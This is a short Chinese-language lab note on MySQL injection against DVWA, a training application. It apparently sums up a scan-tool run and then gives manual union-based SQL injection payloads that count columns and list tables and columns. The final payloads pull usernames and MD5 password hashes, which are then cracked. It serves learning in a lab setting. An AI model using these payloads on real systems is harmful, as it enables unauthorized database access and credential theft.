MYSQL注入

Posted 2021-04-11 Ooooh学习笔记

1.使用万能密码登陆DVWA

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2 输入网址 然后扫描网址是否有SQL漏洞

 

 

3.获取web信息

 

 

4.依次点击数据库，表名，字段 获取数据库信息

 

 

 

 

 

5 点击获取信息 获取数据库记录user password的信息

 

6 进行MD5解密

 

 

实验场景二：使用手工的方式获取DVWA的用户名和密码信息（可选）

本次实验网络拓扑如下：

 

 

 

请给出详细的漏洞利用过程及截图：

 

1. 先获取有几个字段，从1依次增加 发现到3时报错 所以有2个字段

1’ order by 3 #

 

 

 

 

获取所在的文件名

1’  union select database(),99 #

 

3 接着找所在的文件下有什么文件 发现有来宾和用户两个文件

1' union select table_name,98 from information_schema.tables where table_schema='dvwa' #

 

4 查询在用户文件下有没有敏感信息 发现有user 和password

1' union select column_name,98 from information_schema.columns where table_schema='dvwa' and table_name='users'#

 

5 获取用户名和MD5加密密码

1' union select user,password from dvwa.users #

 

6 进行MD5解密